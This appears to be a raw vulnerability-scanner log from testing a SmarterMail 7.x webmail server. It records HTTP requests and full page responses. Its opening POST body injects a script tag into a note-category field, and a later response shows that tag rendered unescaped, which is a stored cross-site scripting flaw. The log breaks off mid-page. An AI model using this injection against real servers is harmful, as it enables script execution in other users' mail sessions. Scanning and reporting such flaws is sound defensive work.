__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

GET /Main/frmNote.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 14:21:29 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4820
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNote.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMwODkzMTIzDxYGHghfX19UaXRsZQUITXkgTm90ZXMeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgICAw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ8PFgIfA2hkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8DaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBDxYCHwNoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAg9kFgQCAQ9kFgJmD2QWAgIBD2QWAmYPEGQQFQUFV2hpdGUGWWVsbG93BFBpbmsFR3JlZW4EQmx1ZRUFBXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMFZ2dnZ2dkZAIDD2QWAmYPZBYCZg8PFgQeCENzc0NsYXNzBQ5JbmRlbnQgU2V0dGluZx4EXyFTQgICZGQCBA9kFgQCAw8PFgIfBQUBMWRkAgUPDxYCHwUFHTxzY3JpcHQ+bnMoMHgwMDVDRDEpPC9zY3JpcHQ+ZGQYAwUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFIWN0bDAwJE1QSCRjaGtDYXRlZ29yeV81ODA3OTYwMjhfMAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjIPMtwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAtAQ2F0ZWdvcmllcwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADUNhdGVnb3JpZXNUYWILZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjEPMtYLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhARGV0YWlscwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACk9wdGlvbnNUYWILZBr5aj/L7srHGTpBcWTl5k3L6W0s" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1'], ['ctl00$BPH$btnSave'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

<div id="ctl00_BPH_btnManageCategories" class="BBButton"><a class="ButtonBarAnchor" href="javascript%3aOpenMasterCategoriesPopup%28%29" onclick="window.location.href = 'javascript\x3aOpenMasterCategoriesPopup\x28\x29'; return false;" tabindex='0'><span class="BBInner">Master Categories</span></a></div>

</div>
<div class="ButtonBarRight">



</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">


<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Details</span></span></a></li>
<li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Categories</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


</div>
<div id="Scrollable" class="ContentDiv">

<div id="ctl00_MPH_UP1">


<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
<div id='ctl00_MPH_OptionsTab' class='' >
<span id="ctl00_MPH_OptionsTab">
<table class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_lstColors">
<td id="ctl00_MPH_lstColors_Label" class="Indent Fixed">Color</td><td id="ctl00_MPH_lstColors_Setting" class="Setting"><select name="ctl00$MPH$lstColors_SettingDropDown" id="ctl00_MPH_lstColors_SettingDropDown">
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select></td>
</tr>
</table>
<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_txtNote">
<td id="ctl00_MPH_txtNote_Setting" class="Indent Setting" colspan="2"><span class='Label'>Note<br /></span><textarea name="ctl00$MPH$txtNote_SettingText" rows="12" cols="50" id="ctl00_MPH_txtNote_SettingText" class="text"></textarea></td>
</tr>
</table>
</span></div>

<div id='ctl00_MPH_CategoriesTab' class='' style='display:none'>
<span id="ctl00_MPH_CategoriesTab">
<table id="ctl00_MPH_tblCategories" class="SettingsContainer SCMarginTop" border="0">
<tr>
<td class="Setting Indent"><input id="ctl00_MPH_chkCategory_580796028_0" type="checkbox" name="ctl00$MPH$chkCategory_580796028_0" /><label for="ctl00_MPH_chkCategory_580796028_0"><script>ns(0x005CD1)</script></label></td>
</tr>
</table>


<a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack('ctl00$MPH$lnkRefresh','')"></a>
</span></div>

</div>


</div>

</div>


<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">

</div>
<div class="FooterSummary">

</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmnote', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>



<script type="text/javascript">
function OpenMasterCategoriesPopup() { SpawnHyperWindow("/Main/frmPopupContactCategories.aspx", 450, 270, RefreshWindow); }
function RefreshWindow() { __doPostBack("ctl00$MPH$lnkRefresh", ""); }
</script>




<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmNote\x2easpx?'); });
WebForm_AutoFocus('ctl00_MPH_txtNote_SettingText');Sys.Application.initialize();
$(function() { SetTopTitle('My\x20Notes\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_Tab1":"ctl00_MPH_OptionsTab","ctl00_TPH_TabStrip_Tab2":"ctl00_MPH_CategoriesTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Note","vcID":"ctl00_MPH_txtNote_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
//]]>
</script>
</form>
</body>
</html>

- /Main/frmRSSList.aspx

/Main/frmRSSList.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmRSSList.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmRSS.aspx?refreshTree=true&id=1903019609

Injection Request

GET /Main/frmRSS.aspx?refreshTree=true&id=1903019609 HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmAddRss.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmRSSList.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 08:19:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4321
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Ronald Smith - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmRSS.aspx?refreshTree=true&amp;id=1903019609" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNjg5NTAwMjQPFggeCF9fX1RpdGxlBQxSb25hbGQgU21pdGgeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZR4KX19sYXN0cmVhZGQWAmYPZBYCAgEPZBYCAgMPZBYCAgEPZBYEAgUPFgIeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7ZAIHDxYCHgdWaXNpYmxlaGQYAgUgY3RsMDAkU3BsaXQkR1AkTmF2UEgkSHlwZXJQYWdlcjEPBShjdGwwMF9TcGxpdF9HUF9NUEhfSHlwZXJHcmlkMXwwfDB8OXw1MHwwZAUdY3RsMDAkU3BsaXQkR1AkTVBIJEh5cGVyR3JpZDEPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkbw0M8E1fKIROqYf2buM81CgpZ0I=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$Split$GP$UpdatePanel2','tctl00$Split$GP$MPH$UP1','tctl00$Split$GP$NavPH$UpdatePanel2','tctl00$Split$GP$CntPH$UpdatePanel3'], ['ctl00$Split$GP$BPH$ForceUpdateButton'], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div class="PageTitle" id="HeaderPanel">
<div class="RoundedPageTitleLeft">
<span id="ctl00_UpdatePanel1">
<div id="PageTitle" class="PageTitleText">
Ronald Smith
</div>
</span>
</div>
</div>

<!-- HyperSplitter -->
<div class='hsOuter ' id='ctl00_Split' style='visibility:hidden'>
<table class='hsContainer' id='ctl00_Split_Container'>
<tr>
<td class='hsVertical ' id='ctl00_Split_GP' style='height:200px'>
<div class='hsContent' style='width:100%;' id='ctl00_Split_GP_Content'>

<div class="ButtonBar" id="ButtonBarTable">
<div class="ButtonBarLeft">

<div id="ctl00_Split_GP_BPH_btnRead" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_Split_GP_BPH_btnRead(); return false;"><span class="BBInner">Read</span></a></div>
<div id="ctl00_Split_GP_BPH_ForceUpdateButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$GP$BPH$ForceUpdateButton',''); return false;"><span class="BBInner">Refresh</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_Split_GP_FilterBar" class="FilterBar" style="display:none;">

</div>

<span id="ctl00_Split_GP_UpdatePanel2">

</span>
<div id="Scrollable" class="ContentDiv">


<script type="text/javascript">
var curUrl = null;
function NavPreviewPane(newUrl) {
if (self._extContentElement != null) {
if (curUrl != newUrl) {
UpdateSplitFrame(newUrl);
curUrl = newUrl;
return true;
}
}
return false;
}

function NavToLink(newUrl) {
window.open(newUrl, "RSSWindow", "");
}
</script>

<span id="ctl00_Split_GP_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_GP_MPH_ctl01' name='ctl00$Split$GP$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst hmLast' id='ctl00_Split_GP_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Read</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_Split_GP_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_Split_GP_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_Split_GP_MPH_HyperGrid1_Table"><tr><td class="NoItems" colspan="2">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_Split_GP_MPH_HyperGrid1_HiddenInput" id="ctl00_Split_GP_MPH_HyperGrid1_HiddenInput" value="" /><input type="hidden" name="ctl00_Split_GP_MPH_HyperGrid1_HiddenLSR" id="ctl00_Split_GP_MPH_HyperGrid1_HiddenLSR" value="" />
</div>
</div>


</div>

</div>
<div id="ctl00_Split_GP_Footer" class="Footer">
<div class="FooterNav">

<div id="ctl00_Split_GP_NavPH_UpdatePanel2">


<span class="HyperPagerWrapper" id="ctl00_Split_GP_NavPH_HyperPager1">
<span class="HyperPager">
</span>
</span>



</div>

</div>
<div class="FooterSummary">

<div id="ctl00_Split_GP_CntPH_UpdatePanel3">

<span id="ctl00_Split_GP_CntPH_CounterLabel"></span>

</div>

</div>
</div>
</div>
</td>
</tr>
<tr>
<td class='hsVertical Splitter' id='ctl00_Split_SB' style='height:2px'>
<div class='hsContent' style='width:100%;' id='ctl00_Split_SB_Content'>
</div>
</td>
</tr>
<tr>
<td class='hsVertical ' id='ctl00_Split_Frame' style=''>
<div class='hsContent' style='width:100%;' id='ctl00_Split_Frame_Content'>

<iframe id="ctl00_Split_Frame_ContentFrame" frameborder="0" scrolling="no" src="javascript:'';" style="border: none"></iframe>

</div>
</td>
</tr>
</table>
</div>


<script type="text/javascript">
var _extContentElement = $get('ctl00_Split_Frame_ContentFrame');
var isResizing = false;
var noPreview = 'False';
var splitterId = "ctl00_Split";
if (parent.HelpPageID) parent.HelpPageID('main/frmrss', '');
var $scrollable = $('#Scrollable');
var $split = $("#ctl00_Split");
function GetSplitPane() { return self; }
document.ResizeEvent = function() {
isResizing = true;
